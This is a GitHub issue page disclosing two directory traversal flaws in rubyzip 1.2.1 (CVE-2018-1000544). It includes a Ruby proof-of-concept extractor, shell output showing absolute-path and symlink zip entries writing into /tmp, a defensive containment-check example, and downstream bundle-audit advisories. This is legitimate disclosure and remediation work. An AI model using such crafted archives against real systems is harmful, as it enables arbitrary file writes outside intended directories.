Several directory traversal vulnerabilities · Issue #369 · rubyzip/rubyzip · GitHub

Closed
tuzovakaoff opened this issue Jun 14, 2018 · 2 comments · Fixed by #371

@tuzovakaoff

Overview

This issue is similar to already closed #315 but I found two ways to bypass that fix.

You can find files for tests in https://github.com/tuzovakaoff/zip_path_traversal

Proof of concept (rubyzip.rb):

```ruby
require 'zip'
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end
```

1. Files with absolute path

UnZip strips the absolute path:

```
> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> unzip absolutepath.zip
Archive:  absolutepath.zip
warning:  stripped absolute path spec from /tmp/
   creating: tmp/
warning:  stripped absolute path spec from /tmp/file.txt
  inflating: tmp/file.txt

> ls
absolutepath.zip	symlink.zip
rubyzip.rb		tmp
```

rubyzip extracts files with the absolute path:

```
> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ls /tmp
file.txt
```

2. Archive with symbolic link

UnZip extracts only the symbolic link:

```
> unzip symlink.zip
Archive:  symlink.zip
    linking: path                    -> ../../../../../tmp
checkdir error:  path exists but is not directory
                 unable to process path/file.txt.
finishing deferred symbolic links:
  path                   -> ../../../../../tmp

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:19 path -> ../../../../../tmp
```

rubyzip extracts the symbolic link and puts the file into the /tmp folder:

```
> ruby rubyzip.rb symlink.zip
Extracting path
Extracting path/file.txt

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:22 path -> ../../../../../tmp

> ls /tmp
file.txt
```

Vulnerable version and test environment

```
> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May  8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64

> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]

> gem list | grep zip
rubyzip (1.2.1)
```

```
> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016

> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]

> gem list | grep zip
rubyzip (1.2.1)
```

@abergmann

CVE-2018-1000544 was assigned to this issue.

zammad-sync pushed a commit to zammad/zammad that referenced this issue Aug 27, 2018
…ubyzip/rubyzip#369) which only affects test env (selenium-webdriver dependency) until it's resolved (rubyzip/rubyzip#376).
mkdynamic added a commit to delighted/rubyzip that referenced this issue Aug 28, 2018
mkdynamic added a commit to delighted/roo that referenced this issue Aug 28, 2018
@mrtc0
mrtc0 commented Sep 3, 2018

Hi,

I think that this fix is inadequate.
The following code can still pass traversal and extract to /tmp/.

```
$ zipinfo absolutepath.zip
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-14 05:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-14 05:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
```

```ruby
require 'zip'

Zip::File.open("./absolutepath.zip") do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    # entry.extract(File.join(test_path, entry.name))
    entry.extract(entry.name)
  end
end
```

I think that if the destination directory is not specified, it should be expanded to the current directory.
What do you think about this?

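A containment check for the extractor loop used in both the proof of concept above and the follow-up comment, as an added example that is not rubyzip's own code: `safe_extract_path` and `classify_entries` are hypothetical names, the caller passes `Dir.pwd` when no destination was given, and the symlink planted in a temp dir is a constructed stand-in for the archive's symlink entry.

```ruby
require 'pathname'
require 'tmpdir'

# Added example (not rubyzip's code). Decide whether a zip entry name may be
# written below dest_dir. Rejects absolute names and ".." segments before
# touching the disk, then resolves the deepest already-existing ancestor of the
# target with File.realpath, so a symlink written by an earlier entry
# ("path -> ../../../../../tmp") cannot redirect a later entry ("path/file.txt")
# outside dest_dir.
def safe_extract_path(dest_dir, entry_name)
  name = entry_name.to_s
  if Pathname.new(name).absolute? || name.match?(/\A[A-Za-z]:/) || name.start_with?('\\')
    raise ArgumentError, "absolute entry name rejected: #{name}"
  end
  if name.split(%r{[\\/]+}).include?('..')
    raise ArgumentError, "parent traversal rejected: #{name}"
  end

  dest_real = File.realpath(dest_dir)
  target = File.join(dest_real, name)

  existing = Pathname.new(target)
  existing = existing.parent until existing.exist? # dangling symlinks count as absent
  resolved = File.realpath(existing.to_s)
  unless resolved == dest_real || resolved.start_with?(dest_real + File::SEPARATOR)
    raise ArgumentError, "entry escapes destination via #{existing}: #{name}"
  end
  target
end

# Classify entry names the way an extraction loop would meet them, in order.
def classify_entries(dest_dir, names)
  names.map do |n|
    [n, :ok, safe_extract_path(dest_dir, n)]
  rescue ArgumentError => e
    [n, :rejected, e.message]
  end
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    File.symlink('..', File.join(dir, 'path')) # constructed stand-in for the symlink entry
    names = ['/tmp/file.txt', 'tmp/../../x', 'docs/readme.txt', 'path/file.txt']
    classify_entries(dir, names).each { |n, v, d| puts "#{v.to_s.ljust(8)} #{n}  (#{d})" }
  end
end
```

Running an archive's entries through `classify_entries` before extracting shows the absolute, `..` and symlink-redirected names rejected while ordinary relative names resolve under the destination.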
walro added a commit to walro/extensionator that referenced this issue Sep 3, 2018
tdg5 pushed a commit to Zensight/extensionator that referenced this issue Sep 4, 2018
* Update rubyzip dependency

rubyzip 1.2.2 includes the fix for CVE-2018-1000544: rubyzip/rubyzip#369

* Update Gemfile.lock to be consistent with the gemspec
shtakai added a commit to shtakai/rspec-retrospective that referenced this issue Sep 4, 2018
I am not sure what `bundle audit` said about `rubyzip`,
but `github` alerted about `ffi`.

So that I did
`bundle update ffi --conservative`.

```
Name: rubyzip
Version: 1.2.1
Advisory: CVE-2018-1000544
Criticality: Unknown
URL: rubyzip/rubyzip#369
Title: Directory Traversal in rubyzip
Solution: remove or disable this gem until a patch is available!

Vulnerabilities found!
```
waterjump added a commit to mes/axlsx that referenced this issue Sep 7, 2018
The rubyzip gem version 1.2.1 contains a security vulnerability allowing
absolute path traversal.  More details can be found here:

rubyzip/rubyzip#369

This change addresses the issue by specifying a rubyzip version greater
than or equal to 1.2.2.

Solves issue randym#599
AdrianCann added a commit to sophomoric/secret that referenced this issue Oct 14, 2018
ruby-advisory-db: 323 advisories
Name: nokogiri
Version: 1.8.4
Advisory: CVE-2018-14404
Criticality: Unknown
URL: sparklemotion/nokogiri#1785
Title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities
Solution: upgrade to >= 1.8.5

Name: rubyzip
Version: 1.2.1
Advisory: CVE-2018-1000544
Criticality: Unknown
URL: rubyzip/rubyzip#369
Title: Directory Traversal in rubyzip
Solution: upgrade to >= 1.2.2
wmfgerrit pushed a commit to wikimedia/mediawiki-vagrant that referenced this issue Nov 27, 2018
From bundle-audit:

Name: ffi
Version: 1.9.18
Advisory: CVE-2018-1000201
Criticality: High
URL: https://github.com/ffi/ffi/releases/tag/1.9.24
Title: ruby-ffi DDL loading issue on Windows OS
Solution: upgrade to >= 1.9.24

Name: rubyzip
Version: 1.2.1
Advisory: CVE-2018-1000544
Criticality: Unknown
URL: rubyzip/rubyzip#369
Title: Directory Traversal in rubyzip
Solution: upgrade to >= 1.2.2

Upgrade:

| ffi     | 1.9.18 -> 1.9.25
| rubyzip | 1.2.1 -> 1.2.2

Bug: T209940
Change-Id: I3da41a964ff1128a4cbba3c05976cfcfca2d731f
Koronen added a commit to Koronen/koronen.github.io that referenced this issue Jan 22, 2019
Address a couple of CVEs (as reported by `bundler-audit`).

    Name: ffi
    Version: 1.9.23
    Advisory: CVE-2018-1000201
    Criticality: High
    URL: https://github.com/ffi/ffi/releases/tag/1.9.24
    Title: ruby-ffi DDL loading issue on Windows OS
    Solution: upgrade to >= 1.9.24

    Name: nokogiri
    Version: 1.8.2
    Advisory: CVE-2018-8048
    Criticality: Unknown
    URL: sparklemotion/nokogiri#1746
    Title: Revert libxml2 behavior in Nokogiri gem that could cause XSS
    Solution: upgrade to >= 1.8.3

    Name: nokogiri
    Version: 1.8.2
    Advisory: CVE-2018-14404
    Criticality: Unknown
    URL: sparklemotion/nokogiri#1785
    Title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities
    Solution: upgrade to >= 1.8.5

    Name: rubyzip
    Version: 1.2.1
    Advisory: CVE-2018-1000544
    Criticality: Unknown
    URL: rubyzip/rubyzip#369
    Title: Directory Traversal in rubyzip
    Solution: upgrade to >= 1.2.2